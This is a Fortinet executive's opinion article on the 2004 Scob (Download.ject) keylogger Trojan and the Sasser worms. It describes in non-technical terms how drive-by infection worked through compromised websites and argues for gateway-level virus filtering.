By: F.Matthew Young III, Vice President for Asia Pacific,
Fortinet, Inc.
NEW DELHI: Late in 2004, viruses took a turn for the worse, intensifying
interest in network and host security. The Scob Trojan (aka Download.ject) and
the various Sasser worm variants are more sophisticated than previous viruses,
while Scob's payload is especially dangerous.
Outbreaks of the Scob Trojan have serious implications for both businesses
and individuals. Scob is a keystroke logger that records whatever the user types
into his or her computer, and sends it over the Internet to a hacker.
Information such as an online banking login, user name and password, PIN
(Personal Identification Number), even a network login name and password are no
longer secure and confidential.
Such keystroke loggers have disturbing implications for businesses. When
banking data gets compromised and customers lose money through these malicious
attacks, who bears the liability? If the infected PC or laptop was
operating behind a company firewall, should the company bear part of the blame -
and the liability?
The implications for government agencies and the military are even more
serious, because potentially people's their lives could be at risk. For this
reason, the US-CERT (Computer Emergency Response Team) has issued an advisory
calling for people to stop using Microsoft's Internet Explorer and switch to
another web browser.
You Are Not Alone
Security problems can be more acute in SOHO's and smaller offices, which tend
to be less strict that big corporations in enforcing virus scanning and updating
their virus signature files. With smaller IT budgets and teams, they are more
vulnerable because they have neither the time, money nor resources to keep out
such sophisticated attacks.
Modes of Transmission
The ubiquity of viruses and worms propagated by email may have contributed to
the browser “blind-spot”. The Scob Trojan exploits a weakness in
Microsoft's Internet Explorer, that allows a script to be executed on the
user's machine simply by viewing a website. Because the threat comes not from
obviously fake websites or sites with dubious content (example: pornography and
bootleg software sites), but from reputable sites that have been compromised,
such as the Kelley Blue Book automobile pricing guide, the virus circumvents
typical website filtering mechanisms in firewalls. This mode of attack caught
Microsoft by surprise, prompting the company to issue a configuration change in
lieu of a fix to be released later.
The Scob Trojan is essentially a “binary agent” method of attack, that
is, it requires two conditions - a compromised website and browser vulnerability
- in order to work. This level of sophistication in a virus is quite
frightening. Previous viruses required action on the user's part, such as
clicking an attachment or permitting a download, but Scob requires neither.
Because the payload is not in the email, virus and spam filtering on email
servers simply would not work.
The Russian website that received keystroke information from infected
machines was quickly shut down, but the precedent had already been set.
Typically, when new virus methods are “developed”, they herald more attacks,
even though anti-virus companies may have already developed detection and
removal strategies and/or software.
A little history and modern medicine
Security problems have been with us from the early days of computing.
The Michelangelo virus, on DOS, predated the Internet, spreading through shared
floppy disks. Transmission was slow because there were few companies and
organisations using networks. With the Internet, transmission is a lot easier
and the infection can spread rapidly to more computers.
Anti-virus software is understood by a vast majority of system
administrators, as a “host-only” solution. That is, the anti-virus software
is installed on PCs, laptops and servers by system administrators, scans are
executed on the machine itself and virus updates have to be downloaded manually
on to the system.
This is a difficult strategy to implement and maintain, as any system
administrator will attest. Typically users are difficult to train to perform
periodic virus scans and signature updates, and are prone to clicking
attachments and infecting their own systems. The problem escalates dramatically
for larger companies where technology professionals are usually stretched thin
by the demands of the information infrastructure and often give a low priority
to maintaining security on individual PCs. Yet these are the single weakest link
in the company network.
A better strategy involves stopping viruses and spam at the gateway, and
there are products available that offer these solutions. The concept is, if you
can stop most of the malicious content “out there” from entering your
network, the security situation on individual PCs and laptops becomes far more
manageable. System administrators can concentrate on just one, or a few, servers
or network appliances, instead of tens or hundreds of user workstations.
To read more, log on to www.www.ciol.com/security